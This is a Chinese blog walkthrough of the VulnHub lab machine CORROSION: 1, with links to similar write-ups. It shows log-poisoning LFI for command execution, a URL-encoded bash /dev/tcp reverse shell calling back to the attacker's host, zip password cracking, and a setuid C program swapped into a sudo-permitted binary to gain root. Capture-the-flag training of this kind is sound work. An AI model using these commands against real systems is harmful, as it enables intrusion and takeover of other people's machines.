vulnhub靶场,CORROSION: 1

最新推荐文章于 2024-09-04 15:15:30 发布
最新推荐文章于 2024-09-04 15:15:30 发布
阅读量1.8k 收藏 6
点赞数 2
分类专栏: 靶场实战 文章标签: 文件包含 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kukudeshuo/article/details/122405861
版权

vulnhub靶场,CORROSION: 1

环境准备

靶机下载地址:https://www.vulnhub.com/entry/corrosion-1,730/
攻击机:kali(192.168.109.128)
靶机:CORROSION: 1(192.168.109.192)
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式
目标:获取目标靶机root目录下的flag

信息收集

使用arp-scan确定目标靶机

确定目标靶机IP为192.168.109.192
使用nmap扫描查看目标靶机开放端口

开放端口:22、80
浏览器访问目标80端口

没啥可利用的
目录扫描

gobuster dir -u http://192.168.109.192/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip


发现tasksblog-post页面
访问tasks页面

查看tasks_todo.txt文件内容

这里说的是ssh服务的一些安全措施,可能是提示跟ssh有关
访问blog-post页面

也没有发现什么,尝试对二级目录进行扫描

gobuster dir -u http://192.168.109.192/blog-post/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip


发现archives页面,进行访问

看到randylogs.php文件,进行访问

打开却发现一篇空白,根据前面给的ssh信息猜想可能是要去污染ssh日志文件,所以这里应该是有LFI的,但是不知道参数是什么,fuzz一波

ffuf -c -w /usr/share/wordlists/dirb/big.txt -u 'http://192.168.109.192/blog-post/archives/randylogs.php?FUZZ=/etc/passwd' -fs 0


参数是file,验证LFI

LFI验证成功

渗透过程

尝试包含ssh日志文件

包含成功,现在只需要讲一句话木马写进来即可

尝试执行命令看一句话是否写入成功

view-source:http://192.168.109.192/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=ifconfig


可以看到命令执行成功了,进行反弹shell

kali:nc -lvvp 4444
靶机:view-source:http://192.168.109.192/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=echo%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.109.128%2F4444%200%3E%261%22%20%7C%20bash

可以看到kali这边成功反弹回来一个shell

权限提升

查看当前用户的suid命令

没有什么能够利用的命令经过一番查看,在/var目录下发现backups文件,可能是备份文件
进入/var/backups目录,发现一个zip文件

使用python搭建一个临时的http服务

kali这边将zip文件下载到本地

解压发现需要密码
使用fcrackzip进行爆破

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u user_backup.zip


得到密码后进行解压,在my_password.txt文件里发现一个密码

进入靶机的家目录看看有几个用户

只有一个randy用户,说明这个密码肯定是他的密码
ssh连接到randy用户

成功连接,查看randy用户的sudo命令

可以看到当前用户可以在无密码的情况下操作/home/randy/tools/easysysinfo文件,进入这个目录进行查看

自己写一个权限提升的c代码去替换easysysinfo文件,然后编译即可

#include <unistd.h>
#include <stdlib.h>

void main()
{
	setuid(0);
	setgid(0);
	system("bash -i");
}


没有vim怎么办呢?换用nano命令

gcc编译一下

使用sudo命令运行easysysinfo文件

成功提升为root权限,在其root目录下面成功获取flag,靶机CORROSION: 1渗透结束

super 硕
关注
专栏目录
VulnHub靶场-Corrosion:1
hxync的博客
08-14 678
靶场下载地址:Corrosion:1 下载好之后导入virtualbox启动 Kali IP地址: Nmap扫描靶机IP: Nmap扫端口: 浏览器访问80端口: 没发现什么有用的信息 Dirbuster扫目录: 访问一下扫到的内容,发现了txt文件里似乎有提示信息 推测是在登录日志中可能存在文件包含 Fuzz找下参数: ssh登录尝试一下: 发现确实存在文件包含,上传一句话木马: 命令执行成功: 反弹shell 先监听端口 url编码: 成功拿到shell 在/var/ba
corrosion:Eclipse Corrosion-Eclipse IDE中的Rust版本
05-04
Corrosion是Eclipse IDE的Rust开发插件,通过与Rust Analyzer语言服务器,CargoRunner和gdb调试器集成,提供了丰富的版本体验。 下载/安装 腐蚀 从成熟的Eclipse IDE进行Rust开发。 或者 在您的计算机上正确安装了...
vulnhub靶场——CORROSION:1
Czheisenberg的博客
02-16 2082
准备 攻击机:kali 靶机: CORROSION: 1 NAT 192.168.91.0 网段 下载连接: https://www.vulnhub.com/entry/corrosion-1,730/ 信息搜集与利用 主机发现 python3 ping.py -H 192.168.91.0/24 如图所示得到目标靶机IP地址: 192.168.91.188 端口扫描 如图所示只开放了 22,80 两个端口。 HTTP http://192.168.91.188/ 目录扫描 挨个访问上面的路径:
2024年最新kali Linux安装教程(超详细,图文并茂)
最新发布
HUANGXIN9898的博客
09-04 2247
官网镜像链接:https://cdimage.kali.org/kali-2023.4/kali-linux-2023.4-vmware-amd64.7z。链接:https://www.123pan.com/s/cvBqVv-4FUXv.html提取码:c7mI。更新软件列表(非root权限在命令行前加sudo),时间可能较长,我这里只更新索引。apt-get autoclean 删除未安装的deb包。对于从来没有接触过网络安全的同学,我们帮你准备了详细的。,大家跟着这个大的方向学习准没问题。
vulnhub-Corrosion: 1
qq_43006864的博客
05-10 689
Corrosion: 1 ~ VulnHub 靶机: 攻击机: Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux 信息收集: nmap 192.168.1.1/24 由于这个靶机没有给出ip地址,这里需要自己扫描,这里根据他开放的22和80端口判断,192.168.1.102这台机是靶机。因为我这就这么几台电脑。 继续扫描 nmap -sS -s..
VULNHUB靶机】Corrosion: 1
travelnight的博客
03-23 3470
在家隔离,好久没玩靶机了,现在来整一个。
CORROSION: 1
qq_60481227的博客
10-30 127
CORROSION系列的靶机打靶记录,第一台靶机,难度:easy
腐蚀matlab代码-Corrosion:用塔菲尔外推法计算腐蚀速率
05-22
在提供的"Corrosion-master"压缩包中,可能包含了实现这些步骤的Matlab源代码,如数据读取、预处理、图形绘制、曲线拟合和结果计算等函数。通过阅读和理解这些代码,可以学习到如何在实际项目中应用塔菲尔外推法进行...
Corrosion current Tafel - Matlab (1)_腐蚀_corrosion_金属腐蚀_随机大小圆的生成_
09-29
标题中的“Corrosion current Tafel - Matlab (1)”提到了腐蚀电流和Tafel曲线,这在金属腐蚀研究中是非常重要的概念。Tafel曲线是描述电化学腐蚀过程中阴极和阳极反应速率与电位关系的图表,通过分析Tafel曲线,...
46244-130838-1-SM_corrosion_
09-29
1. **目视检查**:这是最基础也是最直观的腐蚀检测方法,通过肉眼观察设备表面的锈蚀、颜色变化或裂纹等迹象。虽然简单易行,但其局限在于只能发现裸露的腐蚀痕迹,难以探测内部或隐蔽部位的腐蚀情况。 2. **测厚仪...
看完这篇 教你玩转渗透测试靶机vulnhubCorrosion:1
Aluxian_的博客
06-24 1934
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Easy。
vulnhub刷题记录(CORROSION: 1)
ailx10
08-28 319
英文名称:CORROSION: 1中文名称:腐蚀:1发布日期:2021 年 7 月 31 日难度:容易描述:一个适合初学者的简单盒子,但不太容易。祝你好运。提示:枚举属性。下载地址:https://www.vulnhub.com/entry/corrosion-1,730/ 1、开机(用户名 randy)开机2、主机发现(192.168.199.118)主机发现3、端口扫描(22、80)端口扫描...
vulnhub靶机-Corrosion
臭nana的博客
08-16 763
1、找到靶机ip:192.168.162.131 nmap -sn 192.168.162.0/24 2、扫描靶机端口,发现开放22和80端口 ┌──(root????cracer)-[~] └─# nmap -A -p- 192.168.162.131 Starting Nmap 7.91 ( https://nmap.org ) Nmap scan report for 192.168.162.131 Host is up (0.00067s latency).
corrosion 靶机(ffuf模糊测试,命令执行)
m0_66299232的博客
01-13 909
4.因为22端口开放,又有文件泄露漏洞,那么就可以利用22端口把木马写入auth.log文件里,造成命令执行。4.下载下来后,进行解压不成功需要密码,使用fcrackzip进行破解密码。2.访问网页1发现/archives下面有俩个文件,访问后有一个php文件。1.由于没有找到可利用信息,将linpeas.sh下载下来,进行探测。2.找到一个user_backup.zip文件,应该是一个用户的备份!3.既然这个命令是三个小命令合起来的 ,那么就有三种提权方法!6.开启监听,执行命令,反弹shell成功。
Corrosion2( 侵蚀)靶机
m0_66299232的博客
10-02 585
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip //解出文件密码。sudo /usr/bin/python3.8 /home/randy/randombase64.py //执行之后就会触发写入的提权脚本;5.sudo -l 发现一个.py文件有权限,查看.py文件后发现,他一直调用base64。2.gzip -d rockyou.txt.gz //解压字典里的密码文件。虚拟机网络链接模式:桥接模式。将文件下载下来进行解压!
Vulnhub靶机:Corrosion1
qq_48904485的博客
01-09 517
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:corrosion:1(10.0.2.12)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/corrosion-1,730/
Corrosion2靶机wp
m0_52496313的博客
08-24 538
Corrosion2靶机wp
靶机渗透练习36-Corrosion
hirak0的博客
04-18 539
靶机描述 靶机地址:https://www.vulnhub.com/entry/corrosion-1,730/ Description Difficulty: Easy A easy box for beginners, but not too easy. Good Luck. Hint: Enumerate Property. 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.146 注:靶机与Kali的IP地址只需要在同
vulnhub靶场——CORROSION:2
Czheisenberg的博客
02-16 3180
vulnhub靶场——CORROSION:2 Wirteup
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值